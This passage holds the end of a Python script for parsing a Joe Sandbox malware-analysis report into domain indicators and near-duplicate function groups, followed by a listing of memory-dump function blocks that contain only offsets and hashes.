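FIELD_RE = re.compile(r"^•\s*([^:]+):\s*(.*)$")          # "• Key: value" bullet lines
OFFSET_RE = re.compile(r"Offset:\s*([0-9A-Fa-f]+)")       # image base in the Source File field
DOMAIN_RE = re.compile(r"^(?:[a-z0-9-]+\.)+[a-z]{2,}$", re.I)
FILE_EXT = (".dll", ".exe", ".sys", ".ps1", ".txt")       # file names also match DOMAIN_RE


@dataclass
class FunctionBlock:
    fields: dict = field(default_factory=dict)

    def multi(self, key):
        # Assumed: Joe Sandbox joins several API/string entries with '$'.
        return [v for v in self.fields.get(key, "").split("$") if v]

    @property
    def base(self):
        m = OFFSET_RE.search(self.fields.get("Source File", ""))
        return int(m.group(1), 16) if m else None


def parse_blocks(text):
    """One FunctionBlock per 'Memory Dump Source' header; bullet lines become fields."""
    blocks = []
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":
            blocks.append(FunctionBlock())
        elif blocks and (m := FIELD_RE.match(line)):
            blocks[-1].fields[m.group(1).strip()] = m.group(2).strip()
    return blocks


def domain_iocs(blocks):
    """String IDs shaped like host names, minus obvious file names."""
    return sorted({s for b in blocks for s in b.multi("String ID")
                   if DOMAIN_RE.match(s) and not s.lower().endswith(FILE_EXT)})


def nibble_distance(h1, h2):
    """Number of differing hex digits between two equal-length fuzzy hashes."""
    return sum(a != b for a, b in zip(h1.upper(), h2.upper()))


def near_duplicates(blocks, max_dist=8):
    """Function pairs whose Instruction Fuzzy Hashes differ in at most max_dist digits."""
    pairs = []
    for a, b in combinations(blocks, 2):
        ha, hb = a.fields.get("Instruction Fuzzy Hash"), b.fields.get("Instruction Fuzzy Hash")
        if ha and hb and len(ha) == len(hb) and (d := nibble_distance(ha, hb)) <= max_dist:
            pairs.append((a.fields["Instruction ID"], b.fields["Instruction ID"], d))
    return pairs


if __name__ == "__main__":
    blocks = parse_blocks(SAMPLE)
    print(f"{len(blocks)} functions, image base {blocks[0].base:#x}")
    print("domain IOCs:", domain_iocs(blocks))
    for ia, ib, d in near_duplicates(blocks):
        print(f"{ia[:12]} ~ {ib[:12]}: {d} differing nibbles")
```

Run against the whole listing, `domain_iocs` gives a first cut of network indicators to cross-check against the report's own C2 configuration and Suricata alerts; treat its output as candidates, since any dotted string with a letters-only tail (a file name with an unusual extension, a version string) will match. The distance threshold in `near_duplicates` is a tuning knob: hashes of the same length with a distance under roughly ten are usually copies of one routine with different constants, which is useful for collapsing the many empty-string blocks in a listing like this one into a few function families before manual review.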
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7bc9fef166dd5496ef6ceaf1e2a8a6df33b96f85110195c366fdd9baca1aa122
                                                                            • Instruction ID: 09169ce3298d92eea6472291520ceeeb69e1a21e8ab5828b1ccc29de8c9eb78e
                                                                            • Opcode Fuzzy Hash: 7bc9fef166dd5496ef6ceaf1e2a8a6df33b96f85110195c366fdd9baca1aa122
                                                                            • Instruction Fuzzy Hash: AD514574A083218BC324CF59D89236BB3F1FF85704F44492DF9848B395E7789909CB8A
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2b17885a6bfbbce7e50322f50b18ffad07276d7359f74504680f3407b5a97f3f
                                                                            • Instruction ID: 4356e0b44275961aef890112f9ded24ec9d48ae6f755a9185e8fc838a420a592
                                                                            • Opcode Fuzzy Hash: 2b17885a6bfbbce7e50322f50b18ffad07276d7359f74504680f3407b5a97f3f
                                                                            • Instruction Fuzzy Hash: 2C51C272604A508FC3398F3DD891666FBE2BB9531470C8A6DD8A6CB7D2D738E405CB94
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ed4c0fc3cab28bf690d727e877877fa73d2a7e819b5ef407fd0cf97e11a10734
                                                                            • Instruction ID: 9f9524e03ee008743a518672b965bd27adcbd914f2877ff32669ca8b509a8823
                                                                            • Opcode Fuzzy Hash: ed4c0fc3cab28bf690d727e877877fa73d2a7e819b5ef407fd0cf97e11a10734
                                                                            • Instruction Fuzzy Hash: 82412377B587000BA31CDE7A9C9316BF9E39BC6214F2ED53DC49ACB396E93C85064608
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 22119c604045783855c9f665eb46ea68fba03f10e7733bebb236ebf8922f9fa2
                                                                            • Instruction ID: 656276dd7e1dae3f01ce76c051d4e3b2132fe90f5ad23d18b5a05a3d66cfde08
                                                                            • Opcode Fuzzy Hash: 22119c604045783855c9f665eb46ea68fba03f10e7733bebb236ebf8922f9fa2
                                                                            • Instruction Fuzzy Hash: 5B31AE3675C7480BE714DF749895337FAD3DBD6318F0D503EC04197292E9A8D8094288
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 636d1c9bd8d2c55862d9f449e89db9ad978e94277065755bc9dbdfdfb4ea5689
                                                                            • Instruction ID: 4d249623180b0c2e6e828a2234bdf9e42cf2a0bcbaa669b47996c825abde182f
                                                                            • Opcode Fuzzy Hash: 636d1c9bd8d2c55862d9f449e89db9ad978e94277065755bc9dbdfdfb4ea5689
                                                                            • Instruction Fuzzy Hash: AF21F5355083825FE7418B34A4917ABBBE1CB93324F589E6DE0D297293D768C44BCB1A
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f4a6d8e3c5b31bb15c42b56cbbf23dac4865dd0dd9320103428c7ddc5d2897d1
                                                                            • Instruction ID: 24313bebf8bd189c0fe35e9e1825c50ed8580f430db5fa180b5806889a76d3db
                                                                            • Opcode Fuzzy Hash: f4a6d8e3c5b31bb15c42b56cbbf23dac4865dd0dd9320103428c7ddc5d2897d1
                                                                            • Instruction Fuzzy Hash: 082122756083228FD310DFA5C85112BB7F1FF8A750F44986DE9D59B351E3789808C79A
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                            • Instruction ID: f28c9c4e23fb0f831667b594d4aea64b3815eb4f033e86716a1d240f557620c5
                                                                            • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                            • Instruction Fuzzy Hash: 61112933A081D44EC3128D3C84406A9BFA34AD7235F59539AF5F89B2D2D7268D8B8399
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c5ce9a645a0e85fde848b1b17a72ffb4a4b126b943e49da30ff6a9de82397ccf
                                                                            • Instruction ID: 2b6c09d68eb8bba329e94fa5d497a944570c80518c9f2766836dc602e63e6c37
                                                                            • Opcode Fuzzy Hash: c5ce9a645a0e85fde848b1b17a72ffb4a4b126b943e49da30ff6a9de82397ccf
                                                                            • Instruction Fuzzy Hash: 41015EF160030157E720AE5594E1B2BA2A8AF98718F29663EE84857343DB7AEC05C69D
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d5a5872f6fec6854479f84689dbca6aa1737de5e49f8ce2efccf45834e37143d
                                                                            • Instruction ID: 2d60535eb30d735f96a1e5fa547bdd4e535f1eba030aac4bdf18b9b6bdebcd65
                                                                            • Opcode Fuzzy Hash: d5a5872f6fec6854479f84689dbca6aa1737de5e49f8ce2efccf45834e37143d
                                                                            • Instruction Fuzzy Hash: FB110A36A182604BC754CF6448615B7B7D29F82614B1D457E8C95E7385C62FCD0E8AC4
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1cab1e5bc1623385779295eddcb0f75ce1460b49c418aa6e5c98035987fbf9ee
                                                                            • Instruction ID: 056fcb02a901166a3bcd98eadbcb5aefd492d11e42655132c9b34e8564ba8bdc
                                                                            • Opcode Fuzzy Hash: 1cab1e5bc1623385779295eddcb0f75ce1460b49c418aa6e5c98035987fbf9ee
                                                                            • Instruction Fuzzy Hash: D701C4206087928BD305CF399454327BBE29BD3314F1889AEE0D1D73D2CB79CC4A8B56
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 04108728d60b9b7473b92bc2f38e6b2762a3711e90d5a366ea1267bd58152f49
                                                                            • Instruction ID: 91370234491c48341d1b32fcd386e8c46a18f39f5008db9c7630c7d4ed89aa12
                                                                            • Opcode Fuzzy Hash: 04108728d60b9b7473b92bc2f38e6b2762a3711e90d5a366ea1267bd58152f49
• Instruction Fuzzy Hash: 8AF054255896C34AD3168B3A80B0732FBE14FAB255F1C25E5D4E187382DB2AEA099658

Memory Dump Source
• Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f3ddefed221d102455d9f6df1d0961a7330b6cd9747059ec875db45aa67025fd
• Instruction ID: cee5a04db7c6a7700622fcb5f76ee1ddb9848a8fbe1dc9a6f488811b705ef408
• Opcode Fuzzy Hash: f3ddefed221d102455d9f6df1d0961a7330b6cd9747059ec875db45aa67025fd
• Instruction Fuzzy Hash: 9FD0127570C1404FE7599A3494A26A7B7E2C79B325F11686DD0C293652C216941B4E0A

Memory Dump Source
• Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
• Instruction ID: 2c901a7a29f66bf787f40720772bc8c584e69b152b80f66a481ebbf7ac839097
• Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
• Instruction Fuzzy Hash: F0D0A7715487A10E57588D3804A04B7FBE9EA87612B18159FE4D5E3209D624DC42469C

Memory Dump Source
• Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 53d9efecdbc41310def01a24194b08a5b6974b30575c97dbe6098e8e43e52e2d
• Instruction ID: d2b1bf2204416ed491fe5597db563d55677a20c645860d3af38da09da04eb3ad
• Opcode Fuzzy Hash: 53d9efecdbc41310def01a24194b08a5b6974b30575c97dbe6098e8e43e52e2d
• Instruction Fuzzy Hash: 93E06C7DA596218F9310DF58EC80D12B3B0B75B705762A0BADD00A7332DB30E81ACB4C

Memory Dump Source
• Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1c5223367fba0a71086e661a1f683c7cfbac3f0ff12aae6a8d94f4e45a743fd1
• Instruction ID: ccdf2ff349c7f4701b1dfec56dc2b62cf1f4e611b3be8f3cf6039e062017c520
• Opcode Fuzzy Hash: 1c5223367fba0a71086e661a1f683c7cfbac3f0ff12aae6a8d94f4e45a743fd1
• Instruction Fuzzy Hash: 5EB092A9C4241886E6197B113C125ABB0248913308F1D6436EC0632242A73BE21A81DF

APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
Similarity
• API ID: FreeString
• String ID: GHH
• API String ID: 3341692771-3392360184
• Opcode ID: 18b3440c6482ca3f9d0b883c490c54257cea9635b6b4e9a92e1133ff8d32fa70
• Instruction ID: 4a72f8dc8cd204c48d0b7db5c6f2cab64994286808cfb3299175447be1da39df
• Opcode Fuzzy Hash: 18b3440c6482ca3f9d0b883c490c54257cea9635b6b4e9a92e1133ff8d32fa70
• Instruction Fuzzy Hash: 82F039B9600A408FDB08FF39C894A6AB7B1BB89300F12053CDA468B724DA30A801CB05